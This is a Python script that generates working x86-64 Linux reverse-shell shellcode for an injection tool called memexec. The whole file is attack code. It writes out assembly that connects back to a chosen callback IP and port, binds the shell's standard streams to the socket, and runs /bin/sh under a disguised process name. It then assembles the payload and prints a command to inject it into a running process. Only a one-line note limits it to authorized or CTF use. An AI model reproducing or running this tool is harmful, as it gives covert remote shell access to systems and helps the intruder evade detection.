#!/usr/bin/env python3
"""
Generate x86-64 Linux reverse-shell shellcode for linux-memexec.

The blob: socket(AF_INET, SOCK_STREAM) -> connect -> dup2 x3 ->
execve("/bin//sh", [name, NULL], NULL). Position-independent raw bytes,
~90 bytes plus the argv[0] name. Feed it to memexec:

    ./memexec sc.bin                # run as a thread of this process
    ./memexec sc.bin --name <proc>  # inject into an existing process

Requires NASM (same as the 32-bit generate_elf.py payload). Use only on
systems and CTF targets where you have authorization.
"""
from __future__ import annotations

import argparse
import socket
import subprocess
from pathlib import Path


def port_imm(port: int) -> int:
    """Network-order port as the value stored by ``mov word [rsp+2], imm``."""
    if isinstance(port, bool) or not isinstance(port, int) or not 1 <= port <= 65535:
        raise ValueError("port must be an integer from 1 to 65535")
    return ((port & 0xFF) << 8) | (port >> 8)


def ip_imm(ip: str) -> int:
    """Network-order IPv4 as the value stored by ``mov dword [rsp+4], imm``."""
    return int.from_bytes(socket.inet_pton(socket.AF_INET, ip), "little")


def name_qwords(name: str) -> list[int]:
    """UTF-8 name padded to an 8-byte boundary, as little-endian qwords."""
    if not isinstance(name, str) or not name:
        raise ValueError("name must be a non-empty string")
    encoded = name.encode("utf-8")
    if b"\x00" in encoded:
        raise ValueError("name must not contain a NUL byte")
    padded = encoded + b"\x00" * ((-len(encoded)) % 8)
    return [
        int.from_bytes(padded[i : i + 8], "little")
        for i in range(0, len(padded), 8)
    ]


def build_asm(ip: str, port: int, name: str) -> str:
    port_v = port_imm(port)
    ip_v = ip_imm(ip)
    name_pushes = "\n\n".join(
        f"    mov rbx, 0x{q:016x}\n    push rbx"
        for q in reversed(name_qwords(name))
    )

    return f"""; Generated by shellcode.py - x86-64 Linux reverse shell for memexec
BITS 64

    ; socket(AF_INET, SOCK_STREAM, 0) -> rax = sockfd
    xor eax, eax
    push 2
    pop rdi
    push 1
    pop rsi
    cdq
    mov al, 41
    syscall
    mov r8, rax

    ; connect(sockfd, {{sin_family, sin_port, sin_addr}}, 16)
    sub rsp, 16
    mov word [rsp], 2
    mov word [rsp + 2], 0x{port_v:04x}                  ; htons({port})
    mov dword [rsp + 4], 0x{ip_v:08x}                   ; inet_addr({ip!r})
    mov rdi, r8
    mov rsi, rsp
    mov rdx, 16
    mov al, 42
    syscall

    ; dup2(sockfd, stdin/stdout/stderr)
    mov rdi, r8
    xor rsi, rsi
    xor eax, eax
    mov al, 33
    syscall
    inc rsi
    xor eax, eax
    mov al, 33
    syscall
    inc rsi
    xor eax, eax
    mov al, 33
    syscall

    ; execve("/bin//sh", [name, NULL], NULL)
    xor eax, eax
    push rax                                            ; shell-path terminator
    mov rbx, 0x68732f2f6e69622f
    push rbx
    mov rdi, rsp                                        ; rdi = "/bin//sh"
    push rax                                            ; name terminator
{name_pushes}
    mov rbx, rsp                                        ; rbx = name string
    push rax                                            ; argv terminator
    push rbx                                            ; argv[0] = name pointer
    mov rsi, rsp                                        ; rsi = argv = [name, NULL]
    xor edx, edx                                        ; envp = NULL
    mov al, 59
    syscall
"""


def check_dependencies() -> None:
    try:
        subprocess.run(
            ["nasm", "--version"],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            check=True,
        )
    except (OSError, subprocess.CalledProcessError):
        raise RuntimeError("NASM assembler is not installed")


def generate(
    ip: str,
    port: int,
    name: str,
    output: str | Path = "sc.bin",
    asm_output: str | Path = "sc.asm",
) -> tuple[Path, int]:
    """Assemble the shellcode and return its output path and size in bytes."""
    asm = build_asm(ip, port, name)
    out_path = Path(output)
    asm_path = Path(asm_output)
    if out_path.resolve() == asm_path.resolve():
        raise ValueError("output and assembly paths must be different")

    check_dependencies()
    out_path.parent.mkdir(parents=True, exist_ok=True)
    asm_path.parent.mkdir(parents=True, exist_ok=True)
    with asm_path.open("w", encoding="ascii", newline="\n") as f:
        f.write(asm)

    try:
        subprocess.run(
            ["nasm", "-f", "bin", "-o", str(out_path), str(asm_path)],
            check=True,
        )
    except (OSError, subprocess.CalledProcessError) as exc:
        raise RuntimeError(f"NASM failed while assembling {asm_path}") from exc

    data = out_path.read_bytes()
    if not data:
        raise RuntimeError("NASM produced an empty output")
    return out_path, len(data)


def _port_argument(value: str) -> int:
    try:
        port = int(value, 10)
    except ValueError as exc:
        raise argparse.ArgumentTypeError("port must be a decimal integer") from exc
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError("port must be from 1 to 65535")
    return port


def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(
        description="Generate x86-64 Linux reverse-shell shellcode for memexec"
    )
    parser.add_argument("ip", help="IPv4 callback address")
    parser.add_argument("port", type=_port_argument, help="TCP callback port")
    parser.add_argument("name", help="argv[0] shown by process listings")
    parser.add_argument("-o", "--output", default="sc.bin", help="shellcode output path (default: sc.bin)")
    parser.add_argument(
        "--asm-output",
        default="sc.asm",
        help="generated NASM source path (default: sc.asm)",
    )
    args = parser.parse_args(argv)

    try:
        output, size = generate(args.ip, args.port, args.name, args.output, args.asm_output)
    except (OSError, TypeError, ValueError, RuntimeError) as exc:
        parser.error(str(exc))

    print(f"shellcode {output!s} generated successfully ({size} bytes).")
    print("deploy: ./memexec {output} [--pid PID | --name PROC]".format(output=output))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
